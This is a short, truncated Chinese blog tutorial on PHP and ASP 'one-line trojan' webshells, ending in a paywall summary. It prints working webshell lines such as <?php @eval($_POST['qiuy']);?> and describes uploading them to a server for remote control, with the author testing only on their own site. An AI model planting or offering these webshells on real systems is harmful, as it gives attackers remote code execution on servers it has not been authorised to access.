最近学习看到了一句话木马这个东西,觉得很有意思,那就来试试吧!
什么是一句话木马:
类似于<?php @eval($_POST['qiuy']);?>,POST里面的就是我们的链接密码。这句话是很明显就是一个PHP一句话木马。eval()这个函数的作用就是把参数当作PHP代码来执行,无论你传入的是啥。比如:
eval(echo flag.txt),那么就执行了echo flag.txt这个命令。
类似的还有asp的一句话木马:<%eval request(“qiuy”)%>
如何使用?
首先要把我们的一句话木马生成为一个文件,比如Php的一句话木马,可以新建一个文本,输入一个一句话木马,并把文件名后缀改为.php,这样我们的一句话小木马就形成了。
接着我们就可以去上传我们的木马文件来做邪恶的事情了…
为了方便验证且不违法,我这里使用了自己的网站来测试,大家也可以自己搭建一个服务器来测试,关于如何搭建自己的服务器我会在末尾简单介绍一下。
新建一个木马文件:
把他的后缀改为.php,这里的qiuy你可以自由更改
很快啊,就弹出了
不过不用慌,这就是我们自己写的代码,能弹出这个,代表我

本文介绍了什么是PHP和ASP的一句话木马,通过创建木马文件并利用蚁剑工具进行远程控制,展示了如何实施一句话木马攻击。同时提到了在自己的服务器上进行测试的方法,以及如何使用wampserver搭建服务器。
最低0.47元/天 解锁文章
3629

被折叠的 条评论
为什么被折叠?



